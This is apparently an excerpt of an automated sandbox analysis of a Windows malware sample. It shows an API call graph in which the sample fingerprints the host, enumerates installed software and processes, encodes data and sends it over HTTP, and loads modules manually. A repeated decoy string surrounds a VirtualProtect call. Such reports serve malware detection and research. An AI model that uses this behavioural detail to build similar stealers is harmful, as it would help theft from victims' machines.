15688 df7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15039->15688 15042 dfa9b0 4 API calls 15043 df1e94 15042->15043 15044 dfa8a0 lstrcpy 15043->15044 15045 df1e9d 15044->15045 15046 dfa9b0 4 API calls 15045->15046 15047 df1ebc 15046->15047 15048 dfa8a0 lstrcpy 15047->15048 15049 df1ec5 15048->15049 15050 dfa9b0 4 API calls 15049->15050 15051 df1ee5 15050->15051 15052 dfa8a0 lstrcpy 15051->15052 15053 df1eee 15052->15053 15691 df7b00 GetUserDefaultLocaleName 15053->15691 15056 dfa9b0 4 API calls 15057 df1f0e 15056->15057 15058 dfa8a0 lstrcpy 15057->15058 15059 df1f17 15058->15059 15060 dfa9b0 4 API calls 15059->15060 15061 df1f36 15060->15061 15062 dfa8a0 lstrcpy 15061->15062 15063 df1f3f 15062->15063 15064 dfa9b0 4 API calls 15063->15064 15065 df1f60 15064->15065 15066 dfa8a0 lstrcpy 15065->15066 15067 df1f69 15066->15067 15695 df7b90 15067->15695 15069 df1f80 15070 dfa920 3 API calls 15069->15070 15071 df1f93 15070->15071 15072 dfa8a0 lstrcpy 15071->15072 15073 df1f9c 15072->15073 15074 dfa9b0 4 API calls 15073->15074 15075 df1fc6 15074->15075 15076 dfa8a0 lstrcpy 15075->15076 15077 df1fcf 15076->15077 15078 dfa9b0 4 API calls 15077->15078 15079 df1fef 15078->15079 15080 dfa8a0 lstrcpy 15079->15080 15081 df1ff8 15080->15081 15707 df7d80 GetSystemPowerStatus 15081->15707 15084 dfa9b0 4 API calls 15085 df2018 15084->15085 15086 dfa8a0 lstrcpy 15085->15086 15087 df2021 15086->15087 15088 dfa9b0 4 API calls 15087->15088 15089 df2040 15088->15089 15090 dfa8a0 lstrcpy 15089->15090 15091 df2049 15090->15091 15092 dfa9b0 4 API calls 15091->15092 15093 df206a 15092->15093 15094 dfa8a0 lstrcpy 15093->15094 15095 df2073 15094->15095 15096 df207e GetCurrentProcessId 15095->15096 15709 df9470 OpenProcess 15096->15709 15099 dfa920 3 API calls 15100 df20a4 15099->15100 15101 dfa8a0 lstrcpy 15100->15101 15102 df20ad 15101->15102 15103 dfa9b0 4 API calls 15102->15103 15104 df20d7 15103->15104 15105 dfa8a0 lstrcpy 15104->15105 15106 df20e0 15105->15106 15107 dfa9b0 4 API calls 15106->15107 15108 df2100 15107->15108 15109 dfa8a0 lstrcpy 15108->15109 15110 df2109 15109->15110 15714 df7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15110->15714 15113 dfa9b0 4 API calls 15114 df2129 15113->15114 15115 dfa8a0 lstrcpy 15114->15115 15116 df2132 15115->15116 15117 dfa9b0 4 API calls 15116->15117 15118 df2151 15117->15118 15119 dfa8a0 lstrcpy 15118->15119 15120 df215a 15119->15120 15121 dfa9b0 4 API calls 15120->15121 15122 df217b 15121->15122 15123 dfa8a0 lstrcpy 15122->15123 15124 df2184 15123->15124 15718 df7f60 15124->15718 15127 dfa9b0 4 API calls 15128 df21a4 15127->15128 15129 dfa8a0 lstrcpy 15128->15129 15130 df21ad 15129->15130 15131 dfa9b0 4 API calls 15130->15131 15132 df21cc 15131->15132 15133 dfa8a0 lstrcpy 15132->15133 15134 df21d5 15133->15134 15135 dfa9b0 4 API calls 15134->15135 15136 df21f6 15135->15136 15137 dfa8a0 lstrcpy 15136->15137 15138 df21ff 15137->15138 15731 df7ed0 GetSystemInfo wsprintfA 15138->15731 15141 dfa9b0 4 API calls 15142 df221f 15141->15142 15143 dfa8a0 lstrcpy 15142->15143 15144 df2228 15143->15144 15145 dfa9b0 4 API calls 15144->15145 15146 df2247 15145->15146 15147 dfa8a0 lstrcpy 15146->15147 15148 df2250 15147->15148 15149 dfa9b0 4 API calls 15148->15149 15150 df2270 15149->15150 15151 dfa8a0 lstrcpy 15150->15151 15152 df2279 15151->15152 15733 df8100 GetProcessHeap RtlAllocateHeap 15152->15733 15155 dfa9b0 4 API calls 15156 df2299 15155->15156 15157 dfa8a0 lstrcpy 15156->15157 15158 df22a2 15157->15158 15159 dfa9b0 4 API calls 15158->15159 15160 df22c1 15159->15160 15161 dfa8a0 lstrcpy 15160->15161 15162 df22ca 15161->15162 15163 dfa9b0 4 API calls 15162->15163 15164 df22eb 15163->15164 15165 dfa8a0 lstrcpy 15164->15165 15166 df22f4 15165->15166 15739 df87c0 15166->15739 15169 dfa920 3 API calls 15170 df231e 15169->15170 15171 dfa8a0 lstrcpy 15170->15171 15172 df2327 15171->15172 15173 dfa9b0 4 API calls 15172->15173 15174 df2351 15173->15174 15175 dfa8a0 lstrcpy 15174->15175 15176 df235a 15175->15176 15177 dfa9b0 4 API calls 15176->15177 15178 df237a 15177->15178 15179 dfa8a0 lstrcpy 15178->15179 15180 df2383 15179->15180 15181 dfa9b0 4 API calls 15180->15181 15182 df23a2 15181->15182 15183 dfa8a0 lstrcpy 15182->15183 15184 df23ab 15183->15184 15744 df81f0 15184->15744 15186 df23c2 15187 dfa920 3 API calls 15186->15187 15188 df23d5 15187->15188 15189 dfa8a0 lstrcpy 15188->15189 15190 df23de 15189->15190 15191 dfa9b0 4 API calls 15190->15191 15192 df240a 15191->15192 15193 dfa8a0 lstrcpy 15192->15193 15194 df2413 15193->15194 15195 dfa9b0 4 API calls 15194->15195 15196 df2432 15195->15196 15197 dfa8a0 lstrcpy 15196->15197 15198 df243b 15197->15198 15199 dfa9b0 4 API calls 15198->15199 15200 df245c 15199->15200 15201 dfa8a0 lstrcpy 15200->15201 15202 df2465 15201->15202 15203 dfa9b0 4 API calls 15202->15203 15204 df2484 15203->15204 15205 dfa8a0 lstrcpy 15204->15205 15206 df248d 15205->15206 15207 dfa9b0 4 API calls 15206->15207 15208 df24ae 15207->15208 15209 dfa8a0 lstrcpy 15208->15209 15210 df24b7 15209->15210 15752 df8320 15210->15752 15212 df24d3 15213 dfa920 3 API calls 15212->15213 15214 df24e6 15213->15214 15215 dfa8a0 lstrcpy 15214->15215 15216 df24ef 15215->15216 15217 dfa9b0 4 API calls 15216->15217 15218 df2519 15217->15218 15219 dfa8a0 lstrcpy 15218->15219 15220 df2522 15219->15220 15221 dfa9b0 4 API calls 15220->15221 15222 df2543 15221->15222 15223 dfa8a0 lstrcpy 15222->15223 15224 df254c 15223->15224 15225 df8320 17 API calls 15224->15225 15226 df2568 15225->15226 15227 dfa920 3 API calls 15226->15227 15228 df257b 15227->15228 15229 dfa8a0 lstrcpy 15228->15229 15230 df2584 15229->15230 15231 dfa9b0 4 API calls 15230->15231 15232 df25ae 15231->15232 15233 dfa8a0 lstrcpy 15232->15233 15234 df25b7 15233->15234 15235 dfa9b0 4 API calls 15234->15235 15236 df25d6 15235->15236 15237 dfa8a0 lstrcpy 15236->15237 15238 df25df 15237->15238 15239 dfa9b0 4 API calls 15238->15239 15240 df2600 15239->15240 15241 dfa8a0 lstrcpy 15240->15241 15242 df2609 15241->15242 15788 df8680 15242->15788 15244 df2620 15245 dfa920 3 API calls 15244->15245 15246 df2633 15245->15246 15247 dfa8a0 lstrcpy 15246->15247 15248 df263c 15247->15248 15249 df265a lstrlen 15248->15249 15250 df266a 15249->15250 15251 dfa740 lstrcpy 15250->15251 15252 df267c 15251->15252 15253 de1590 lstrcpy 15252->15253 15254 df268d 15253->15254 15798 df5190 15254->15798 15256 df2699 15256->13688 15986 dfaad0 15257->15986 15259 de5009 InternetOpenUrlA 15263 de5021 15259->15263 15260 de502a InternetReadFile 15260->15263 15261 de50a0 InternetCloseHandle InternetCloseHandle 15262 de50ec 15261->15262 15262->13692 15263->15260 15263->15261 15987 de98d0 15264->15987 15266 df0759 15267 df077d 15266->15267 15268 df0a38 15266->15268 15271 df0799 StrCmpCA 15267->15271 15269 de1590 lstrcpy 15268->15269 15270 df0a49 15269->15270 16163 df0250 15270->16163 15273 df0843 15271->15273 15274 df07a8 15271->15274 15277 df0865 StrCmpCA 15273->15277 15276 dfa7a0 lstrcpy 15274->15276 15278 df07c3 15276->15278 15279 df0874 15277->15279 15316 df096b 15277->15316 15280 de1590 lstrcpy 15278->15280 15281 dfa740 lstrcpy 15279->15281 15282 df080c 15280->15282 15284 df0881 15281->15284 15285 dfa7a0 lstrcpy 15282->15285 15283 df099c StrCmpCA 15286 df09ab 15283->15286 15287 df0a2d 15283->15287 15288 dfa9b0 4 API calls 15284->15288 15289 df0823 15285->15289 15290 de1590 lstrcpy 15286->15290 15287->13696 15291 df08ac 15288->15291 15292 dfa7a0 lstrcpy 15289->15292 15293 df09f4 15290->15293 15294 dfa920 3 API calls 15291->15294 15295 df083e 15292->15295 15297 dfa7a0 lstrcpy 15293->15297 15298 df08b3 15294->15298 15990 defb00 15295->15990 15299 df0a0d 15297->15299 15300 dfa9b0 4 API calls 15298->15300 15301 dfa7a0 lstrcpy 15299->15301 15302 df08ba 15300->15302 15303 df0a28 15301->15303 15304 dfa8a0 lstrcpy 15302->15304 16106 df0030 15303->16106 15316->15283 15638 dfa7a0 lstrcpy 15637->15638 15639 de1683 15638->15639 15640 dfa7a0 lstrcpy 15639->15640 15641 de1695 15640->15641 15642 dfa7a0 lstrcpy 15641->15642 15643 de16a7 15642->15643 15644 dfa7a0 lstrcpy 15643->15644 15645 de15a3 15644->15645 15645->14519 15647 de47c6 15646->15647 15648 de4838 lstrlen 15647->15648 15672 dfaad0 15648->15672 15650 de4848 InternetCrackUrlA 15651 de4867 15650->15651 15651->14596 15653 dfa740 lstrcpy 15652->15653 15654 df8b74 15653->15654 15655 dfa740 lstrcpy 15654->15655 15656 df8b82 GetSystemTime 15655->15656 15657 df8b99 15656->15657 15658 dfa7a0 lstrcpy 15657->15658 15659 df8bfc 15658->15659 15659->14611 15661 dfa931 15660->15661 15662 dfa988 15661->15662 15664 dfa968 lstrcpy lstrcat 15661->15664 15663 dfa7a0 lstrcpy 15662->15663 15665 dfa994 15663->15665 15664->15662 15665->14615 15666->14729 15668 de4eee 15667->15668 15669 de9af9 LocalAlloc 15667->15669 15668->14617 15668->14620 15669->15668 15670 de9b14 CryptStringToBinaryA 15669->15670 15670->15668 15671 de9b39 LocalFree 15670->15671 15671->15668 15672->15650 15673->14739 15674->14880 15675->14882 15676->14890 15805 df77a0 15677->15805 15680 df1c1e 15680->14972 15681 df76c6 RegOpenKeyExA 15682 df76e7 RegQueryValueExA 15681->15682 15683 df7704 RegCloseKey 15681->15683 15682->15683 15683->15680 15685 df1c99 15684->15685 15685->14986 15687 df1e09 15686->15687 15687->15028 15689 df7a9a wsprintfA 15688->15689 15690 df1e84 15688->15690 15689->15690 15690->15042 15692 df7b4d 15691->15692 15693 df1efe 15691->15693 15812 df8d20 LocalAlloc CharToOemW 15692->15812 15693->15056 15696 dfa740 lstrcpy 15695->15696 15697 df7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15696->15697 15706 df7c25 15697->15706 15698 df7d18 15700 df7d1e LocalFree 15698->15700 15701 df7d28 15698->15701 15699 df7c46 GetLocaleInfoA 15699->15706 15700->15701 15702 dfa7a0 lstrcpy 15701->15702 15705 df7d37 15702->15705 15703 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15703->15706 15704 dfa8a0 lstrcpy 15704->15706 15705->15069 15706->15698 15706->15699 15706->15703 15706->15704 15708 df2008 15707->15708 15708->15084 15710 df94b5 15709->15710 15711 df9493 GetModuleFileNameExA CloseHandle 15709->15711 15712 dfa740 lstrcpy 15710->15712 15711->15710 15713 df2091 15712->15713 15713->15099 15715 df7e68 RegQueryValueExA 15714->15715 15716 df2119 15714->15716 15717 df7e8e RegCloseKey 15715->15717 15716->15113 15717->15716 15719 df7fb9 GetLogicalProcessorInformationEx 15718->15719 15720 df7fd8 GetLastError 15719->15720 15726 df8029 15719->15726 15721 df8022 15720->15721 15730 df7fe3 15720->15730 15724 df2194 15721->15724 15725 df89f0 2 API calls 15721->15725 15724->15127 15725->15724 15727 df89f0 2 API calls 15726->15727 15728 df807b 15727->15728 15728->15721 15729 df8084 wsprintfA 15728->15729 15729->15724 15730->15719 15730->15724 15813 df89f0 15730->15813 15816 df8a10 GetProcessHeap RtlAllocateHeap 15730->15816 15732 df220f 15731->15732 15732->15141 15734 df89b0 15733->15734 15735 df814d GlobalMemoryStatusEx 15734->15735 15736 df8163 __aulldiv 15735->15736 15737 df819b wsprintfA 15736->15737 15738 df2289 15737->15738 15738->15155 15740 df87fb GetProcessHeap RtlAllocateHeap wsprintfA 15739->15740 15742 dfa740 lstrcpy 15740->15742 15743 df230b 15742->15743 15743->15169 15745 dfa740 lstrcpy 15744->15745 15746 df8229 15745->15746 15747 df8263 15746->15747 15750 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15746->15750 15751 dfa8a0 lstrcpy 15746->15751 15748 dfa7a0 lstrcpy 15747->15748 15749 df82dc 15748->15749 15749->15186 15750->15746 15751->15746 15753 dfa740 lstrcpy 15752->15753 15754 df835c RegOpenKeyExA 15753->15754 15755 df83ae 15754->15755 15756 df83d0 15754->15756 15757 dfa7a0 lstrcpy 15755->15757 15758 df83f8 RegEnumKeyExA 15756->15758 15759 df8613 RegCloseKey 15756->15759 15769 df83bd 15757->15769 15760 df843f wsprintfA RegOpenKeyExA 15758->15760 15761 df860e 15758->15761 15762 dfa7a0 lstrcpy 15759->15762 15763 df8485 RegCloseKey RegCloseKey 15760->15763 15764 df84c1 RegQueryValueExA 15760->15764 15761->15759 15762->15769 15767 dfa7a0 lstrcpy 15763->15767 15765 df84fa lstrlen 15764->15765 15766 df8601 RegCloseKey 15764->15766 15765->15766 15768 df8510 15765->15768 15766->15761 15767->15769 15770 dfa9b0 4 API calls 15768->15770 15769->15212 15771 df8527 15770->15771 15772 dfa8a0 lstrcpy 15771->15772 15773 df8533 15772->15773 15774 dfa9b0 4 API calls 15773->15774 15775 df8557 15774->15775 15776 dfa8a0 lstrcpy 15775->15776 15777 df8563 15776->15777 15778 df856e RegQueryValueExA 15777->15778 15778->15766 15779 df85a3 15778->15779 15780 dfa9b0 4 API calls 15779->15780 15781 df85ba 15780->15781 15782 dfa8a0 lstrcpy 15781->15782 15783 df85c6 15782->15783 15784 dfa9b0 4 API calls 15783->15784 15785 df85ea 15784->15785 15786 dfa8a0 lstrcpy 15785->15786 15787 df85f6 15786->15787 15787->15766 15789 dfa740 lstrcpy 15788->15789 15790 df86bc CreateToolhelp32Snapshot Process32First 15789->15790 15791 df875d CloseHandle 15790->15791 15792 df86e8 Process32Next 15790->15792 15793 dfa7a0 lstrcpy 15791->15793 15792->15791 15797 df86fd 15792->15797 15796 df8776 15793->15796 15794 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15794->15797 15795 dfa8a0 lstrcpy 15795->15797 15796->15244 15797->15792 15797->15794 15797->15795 15799 dfa7a0 lstrcpy 15798->15799 15800 df51b5 15799->15800 15801 de1590 lstrcpy 15800->15801 15802 df51c6 15801->15802 15817 de5100 15802->15817 15804 df51cf 15804->15256 15808 df7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15805->15808 15807 df76b9 15807->15680 15807->15681 15809 df7765 RegQueryValueExA 15808->15809 15810 df7780 RegCloseKey 15808->15810 15809->15810 15811 df7793 15810->15811 15811->15807 15812->15693 15814 df8a0c 15813->15814 15815 df89f9 GetProcessHeap HeapFree 15813->15815 15814->15730 15815->15814 15816->15730 15818 dfa7a0 lstrcpy 15817->15818 15819 de5119 15818->15819 15820 de47b0 2 API calls 15819->15820 15821 de5125 15820->15821 15977 df8ea0 15821->15977 15823 de5184 15824 de5192 lstrlen 15823->15824 15825 de51a5 15824->15825 15826 df8ea0 4 API calls 15825->15826 15827 de51b6 15826->15827 15828 dfa740 lstrcpy 15827->15828 15829 de51c9 15828->15829 15830 dfa740 lstrcpy 15829->15830 15831 de51d6 15830->15831 15832 dfa740 lstrcpy 15831->15832 15833 de51e3 15832->15833 15834 dfa740 lstrcpy 15833->15834 15835 de51f0 15834->15835 15836 dfa740 lstrcpy 15835->15836 15837 de51fd InternetOpenA StrCmpCA 15836->15837 15838 de522f 15837->15838 15839 de58c4 InternetCloseHandle 15838->15839 15840 df8b60 3 API calls 15838->15840 15845 de58d9 codecvt 15839->15845 15841 de524e 15840->15841 15842 dfa920 3 API calls 15841->15842 15843 de5261 15842->15843 15844 dfa8a0 lstrcpy 15843->15844 15846 de526a 15844->15846 15850 dfa7a0 lstrcpy 15845->15850 15847 dfa9b0 4 API calls 15846->15847 15848 de52ab 15847->15848 15849 dfa920 3 API calls 15848->15849 15851 de52b2 15849->15851 15858 de5913 15850->15858 15852 dfa9b0 4 API calls 15851->15852 15853 de52b9 15852->15853 15854 dfa8a0 lstrcpy 15853->15854 15855 de52c2 15854->15855 15856 dfa9b0 4 API calls 15855->15856 15857 de5303 15856->15857 15859 dfa920 3 API calls 15857->15859 15858->15804 15860 de530a 15859->15860 15861 dfa8a0 lstrcpy 15860->15861 15862 de5313 15861->15862 15863 de5329 InternetConnectA 15862->15863 15863->15839 15864 de5359 HttpOpenRequestA 15863->15864 15866 de58b7 InternetCloseHandle 15864->15866 15867 de53b7 15864->15867 15866->15839 15868 dfa9b0 4 API calls 15867->15868 15869 de53cb 15868->15869 15870 dfa8a0 lstrcpy 15869->15870 15871 de53d4 15870->15871 15872 dfa920 3 API calls 15871->15872 15873 de53f2 15872->15873 15874 dfa8a0 lstrcpy 15873->15874 15875 de53fb 15874->15875 15876 dfa9b0 4 API calls 15875->15876 15877 de541a 15876->15877 15878 dfa8a0 lstrcpy 15877->15878 15879 de5423 15878->15879 15880 dfa9b0 4 API calls 15879->15880 15881 de5444 15880->15881 15882 dfa8a0 lstrcpy 15881->15882 15883 de544d 15882->15883 15884 dfa9b0 4 API calls 15883->15884 15885 de546e 15884->15885 15978 df8ead CryptBinaryToStringA 15977->15978 15979 df8ea9 15977->15979 15978->15979 15980 df8ece GetProcessHeap RtlAllocateHeap 15978->15980 15979->15823 15980->15979 15981 df8ef4 codecvt 15980->15981 15982 df8f05 CryptBinaryToStringA 15981->15982 15982->15979 15986->15259 16229 de9880 15987->16229 15989 de98e1 15989->15266 15991 dfa740 lstrcpy 15990->15991 16164 dfa740 lstrcpy 16163->16164 16165 df0266 16164->16165 16166 df8de0 2 API calls 16165->16166 16167 df027b 16166->16167 16168 dfa920 3 API calls 16167->16168 16169 df028b 16168->16169 16170 dfa8a0 lstrcpy 16169->16170 16171 df0294 16170->16171 16172 dfa9b0 4 API calls 16171->16172 16230 de988d 16229->16230 16233 de6fb0 16230->16233 16232 de98ad codecvt 16232->15989 16236 de6d40 16233->16236 16237 de6d63 16236->16237 16251 de6d59 16236->16251 16252 de6530 16237->16252 16241 de6dbe 16241->16251 16262 de69b0 16241->16262 16243 de6e2a 16244 de6ee6 VirtualFree 16243->16244 16246 de6ef7 16243->16246 16243->16251 16244->16246 16245 de6f41 16249 df89f0 2 API calls 16245->16249 16245->16251 16246->16245 16247 de6f38 16246->16247 16248 de6f26 FreeLibrary 16246->16248 16250 df89f0 2 API calls 16247->16250 16248->16246 16249->16251 16250->16245 16251->16232 16254 de6542 16252->16254 16253 de6549 16253->16251 16256 de6660 16253->16256 16254->16253 16272 df8a10 GetProcessHeap RtlAllocateHeap 16254->16272 16261 de668f VirtualAlloc 16256->16261 16258 de673c 16258->16241 16259 de6730 16259->16258 16260 de6743 VirtualAlloc 16259->16260 16260->16258 16261->16258 16261->16259 16263 de69c9 16262->16263 16267 de69d5 16262->16267 16264 de6a09 LoadLibraryA 16263->16264 16263->16267 16265 de6a32 16264->16265 16264->16267 16270 de6ae0 16265->16270 16273 df8a10 GetProcessHeap RtlAllocateHeap 16265->16273 16267->16243 16268 de6a8b 16268->16267 16271 df89f0 2 API calls 16268->16271 16269 de6ba8 GetProcAddress 16269->16267 16269->16270 16270->16267 16270->16269 16271->16270 16272->16253 16273->16268

                          Executed Functions

                          Function 00DF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 df9860-df9874 call df9750 663 df987a-df9a8e call df9780 GetProcAddress * 21 660->663 664 df9a93-df9af2 LoadLibraryA * 5 660->664 663->664 666 df9b0d-df9b14 664->666 667 df9af4-df9b08 GetProcAddress 664->667 669 df9b46-df9b4d 666->669 670 df9b16-df9b41 GetProcAddress * 2 666->670 667->666 671 df9b4f-df9b63 GetProcAddress 669->671 672 df9b68-df9b6f 669->672 670->669 671->672 673 df9b89-df9b90 672->673 674 df9b71-df9b84 GetProcAddress 672->674 675 df9b92-df9bbc GetProcAddress * 2 673->675 676 df9bc1-df9bc2 673->676 674->673 675->676
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00831650), ref: 00DF98A1
                          • GetProcAddress.KERNEL32(76210000,00831638), ref: 00DF98BA
                          • GetProcAddress.KERNEL32(76210000,00831668), ref: 00DF98D2
                          • GetProcAddress.KERNEL32(76210000,00831698), ref: 00DF98EA
                          • GetProcAddress.KERNEL32(76210000,00831728), ref: 00DF9903
                          • GetProcAddress.KERNEL32(76210000,00838C48), ref: 00DF991B
                          • GetProcAddress.KERNEL32(76210000,008250A8), ref: 00DF9933
                          • GetProcAddress.KERNEL32(76210000,008250E8), ref: 00DF994C
                          • GetProcAddress.KERNEL32(76210000,008316B0), ref: 00DF9964
                          • GetProcAddress.KERNEL32(76210000,008316C8), ref: 00DF997C
                          • GetProcAddress.KERNEL32(76210000,00831740), ref: 00DF9995
                          • GetProcAddress.KERNEL32(76210000,00831758), ref: 00DF99AD
                          • GetProcAddress.KERNEL32(76210000,00825068), ref: 00DF99C5
                          • GetProcAddress.KERNEL32(76210000,008316E0), ref: 00DF99DE
                          • GetProcAddress.KERNEL32(76210000,00831530), ref: 00DF99F6
                          • GetProcAddress.KERNEL32(76210000,00824FE8), ref: 00DF9A0E
                          • GetProcAddress.KERNEL32(76210000,00831518), ref: 00DF9A27
                          • GetProcAddress.KERNEL32(76210000,00831548), ref: 00DF9A3F
                          • GetProcAddress.KERNEL32(76210000,008252A8), ref: 00DF9A57
                          • GetProcAddress.KERNEL32(76210000,00831800), ref: 00DF9A70
                          • GetProcAddress.KERNEL32(76210000,00825168), ref: 00DF9A88
                          • LoadLibraryA.KERNEL32(00831830,?,00DF6A00), ref: 00DF9A9A
                          • LoadLibraryA.KERNEL32(00831848,?,00DF6A00), ref: 00DF9AAB
                          • LoadLibraryA.KERNEL32(008317E8,?,00DF6A00), ref: 00DF9ABD
                          • LoadLibraryA.KERNEL32(00831878,?,00DF6A00), ref: 00DF9ACF
                          • LoadLibraryA.KERNEL32(00831890,?,00DF6A00), ref: 00DF9AE0
                          • GetProcAddress.KERNEL32(75B30000,00831818), ref: 00DF9B02
                          • GetProcAddress.KERNEL32(751E0000,00831860), ref: 00DF9B23
                          • GetProcAddress.KERNEL32(751E0000,008318A8), ref: 00DF9B3B
                          • GetProcAddress.KERNEL32(76910000,00838EC0), ref: 00DF9B5D
                          • GetProcAddress.KERNEL32(75670000,008251A8), ref: 00DF9B7E
                          • GetProcAddress.KERNEL32(77310000,00838B38), ref: 00DF9B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00DF9BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00DF9BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                          • Instruction ID: 3ed7824e0451f198b87b7d0046de5d6d4ebe9940454edba671256a0ecf7e137f
                          • Opcode Fuzzy Hash: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                          • Instruction Fuzzy Hash: F5A13BB5700240DFD374DFA8EA88A6637F9F78C205724856AE686C3A4CDE7F9441CB64
                          Function 00DE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 de45c0-de4695 RtlAllocateHeap 781 de46a0-de46a6 764->781 782 de474f-de47a9 VirtualProtect 781->782 783 de46ac-de474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00DE479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46CD
